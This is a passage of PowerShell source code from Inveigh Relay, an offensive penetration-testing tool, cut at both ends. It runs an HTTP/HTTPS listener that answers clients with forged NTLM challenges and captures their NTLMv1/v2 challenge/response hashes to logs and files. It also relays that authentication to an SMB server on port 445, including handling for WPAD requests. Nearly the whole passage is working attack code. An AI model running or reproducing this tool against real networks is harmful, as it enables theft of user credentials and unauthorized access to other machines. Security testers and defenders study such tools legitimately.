$SCM_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null } 'CloseRequest' { $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2CloseRequest $SMB_file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'TreeDisconnect' } 'TreeDisconnect' { $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2TreeDisconnectRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'Logoff' } 'Logoff' { $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2SessionLogoffRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'Exit' } } if($SMB_relay_failed) { $inveigh.console_queue.Add("SMB relay failed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")]) $SMB_client_stage = 'Exit' } } } if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y') { $inveigh.SMB_relay = $false $inveigh.console_queue.Add("SMB relay auto disabled due to success") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")]) } } $SMB_relay_socket.Close() return $SMB_client_receive } } # HTTP/HTTPS Server ScriptBlock $HTTP_scriptblock = { param ($Challenge,$HTTPIP,$HTTPPort,$Target,$Command,$Usernames,$RelayAutoDisable,$WPADAuth,$SSL,$certificate,$SMB_version,$Service) function NTLMChallengeBase64 { param ([String]$Challenge) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if($Challenge) { $HTTP_challenge = $Challenge $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else { $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } $inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + $HTTP_challenge_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + $HTTP_timestamp + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = $HTTP_challenge return $NTLM } if($HTTPIP -ne '0.0.0.0') { $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) } else { $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) } $HTTP_running = $true $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint try { $HTTP_listener.Start() } catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")]) $HTTP_running = $false } $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate $HTTP_client_close = $true $relay_step = 0 :HTTP_listener_loop while ($inveigh.relay_running -and $HTTP_running) { $TCP_request = "" $TCP_request_bytes = New-Object System.Byte[] 4096 while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { Start-Sleep -m 10 if(!$inveigh.relay_running) { break HTTP_listener_loop } } if($relay_step -gt 0) { $relay_reset++ if($relay_reset -gt 1) { $inveigh.console_queue.Add("SMB relay attack resetting") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")]) $SMB_relay_socket.Close() $relay_step = 0 } } else { $relay_reset = 0 } if($SSL) { if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running) { $HTTP_client = $HTTP_listener.AcceptTcpClient() $HTTP_clear_stream = $HTTP_client.GetStream() $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false) $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN}) $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false) } [byte[]]$SSL_request_bytes = $null do { $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)] } while ($HTTP_clear_stream.DataAvailable) $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes) $HTTP_type = "HTTPS" } else { if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running) { $HTTP_client = $HTTP_listener.AcceptTcpClient() $HTTP_stream = $HTTP_client.GetStream() } while($HTTP_stream.DataAvailable) { $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) } $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) $HTTP_type = "HTTP" } if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*") { $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") { $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-")) $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length) } else { $authentication_header = "" } if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') { $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b } else { $HTTP_response_status_code = 0x34,0x30,0x31 $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 } $NTLM = "NTLM" $NTLM_auth = $false $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) { $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")]) } if($authentication_header.startswith('NTLM ')) { $authentication_header = $authentication_header -replace 'NTLM ','' [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) $HTTP_response_status_code = 0x34,0x30,0x31 if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0) { $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")]) $inveigh.console_queue.Add("Grabbing challenge for relay from $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)]) $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient $SMB_relay_socket.Client.ReceiveTimeout = 60000 $SMB_relay_socket.Connect($Target,"445") $HTTP_client_close = $false $relay_step = 1 if(!$SMB_relay_socket.connected) { $inveigh.console_queue.Add("SMB relay target is not responding") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")]) $relay_step = 0 } if($relay_step -eq 1) { $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version if($SMB_relay_bytes.Length -le 3) { $relay_step = 0 $NTLM = NTLMChallengeBase64 $Challenge } } if($relay_step -eq 1) { $SMB_user_ID = $SMB_relay_bytes[34..33] $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes) $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-","" $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000") $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2 $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)] $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)] $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)] $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] $SMB_session_ID = $SMB_relay_bytes[44..51] if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42') { $SMB_version -eq 'SMB1' } $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 + $SMB_domain_length_offset_bytes + 0x05,0x82 + $SMB_relay_target_flag + 0xa2 + $SMB_relay_NTLM_challenge + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + $SMB_target_length_offset_bytes + $SMB_relay_target_details $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")]) $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP) $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)]) $relay_step = 2 } else { $NTLM = NTLMChallengeBase64 $Challenge } } else { $NTLM = NTLMChallengeBase64 $Challenge } $HTTP_response_status_code = 0x34,0x30,0x31 } elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') { $NTLM = 'NTLM' $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*' $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) if($HTTP_NTLM_domain_length -eq 0) { $HTTP_NTLM_domain_string = '' } else { $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes } $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes if($HTTP_NTLM_user_length -gt 0) { $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes } else { $HTTP_NTLM_user_string = "" } $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes if($HTTP_NTLM_length -eq 24) # NTLMv1 { $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" $NTLM_response = $NTLM_response.Insert(48,':') $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash) } else { $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) { $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) } if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") { $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") } } } else # NTLMv2 { $NTLM_type = "NTLMv2" $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" $NTLM_response = $NTLM_response.Insert(32,':') $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + ")")]) $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + "):`n" + $HTTP_NTLM_hash) if($inveigh.file_output) { $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) } } if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) { $inveigh.IP_capture_list += $HTTP_source_IP } } $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b $NTLM_auth = $true $HTTP_client_close = $true $NTLM_challenge = "" if($inveigh.SMB_relay -and $relay_step -eq 2) { if(!$Usernames -or $Usernames -contains $HTTP_NTLM_user_string -or $Usernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") { if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))) { if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target") { if($NTLM_type -eq 'NTLMv2') { $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")]) SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID $relay_step = 0 } else { $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")]) $SMB_relay_socket.Close() $relay_step = 0 } } else { $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")]) $SMB_relay_socket.Close() $relay_step = 0 } } else { $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")]) $SMB_relay_socket.Close() $relay_step = 0 } } else { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")]) $SMB_relay_socket.Close() $relay_step = 0 } } } else { $NTLM = "NTLM" $HTTP_client_close = $false } } else { if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') { $HTTP_client_close = $true } else { $HTTP_client_close = $false } } $HTTP_timestamp = Get-Date -format r $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) $HTTP_message = "" if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) { $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM) $HTTP_message_bytes = 0x0d,0x0a $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + $HTTP_response_status_code + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, 0x0a,0x44,0x61,0x74,0x65,0x3a + $HTTP_timestamp + 0x0d,0x0a + $HTTP_WWW_authenticate_header + $NTLM + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + $HTTP_content_length_bytes + 0x0d,0x0a + $HTTP_message_bytes } else { $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b $HTTP_message_bytes = 0x0d,0x0a $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + $HTTP_response_status_code + 0x20 + $HTTP_response_phrase + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, 0x0a,0x44,0x61,0x74,0x65,0x3a + $HTTP_timestamp + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + $HTTP_content_length_bytes + 0x0d,0x0a + $HTTP_message_bytes } $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) $HTTP_stream.Flush() Start-Sleep -m 10 $HTTP_request_raw_URL_old = $HTTP_request_raw_URL $HTTP_client_handle_old = $HTTP_client.Client.Handle if($HTTP_client_close) { $HTTP_client.Close() } } else { $HTTP_client.Close() $HTTP_client_close = $true } } $HTTP_client.Close() start-sleep -s 1 $HTTP_listener.Server.blocking = $false Start-Sleep -s 1 $HTTP_listener.Server.Close() Start-Sleep -s 1 $HTTP_listener.Stop() } $control_relay_scriptblock = { param ($RunTime) if($RunTime) { $control_timeout = New-TimeSpan -Minutes $RunTime $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } while ($inveigh.relay_running) { if($RunTime) { if($control_stopwatch.Elapsed -ge $control_timeout) { if($inveigh.HTTP_listener.IsListening) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) Start-Sleep -m 5 $inveigh.relay_running = $false if($inveigh.HTTPS) { try { $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") $certificate_store.Open('ReadWrite') $certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer}) $certificate_store.Remove($certificate) $certificate_store.Close() } catch { if($inveigh.status_output) { $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") } $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") if($inveigh.file_output) { "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } } } $inveigh.HTTP = $false $inveigh.HTTPS = $false } } if($inveigh.file_output -and $inveigh.relay_file_output) { while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append $inveigh.log_file_queue.RemoveAt(0) } while($inveigh.NTLMv1_file_queue.Count -gt 0) { 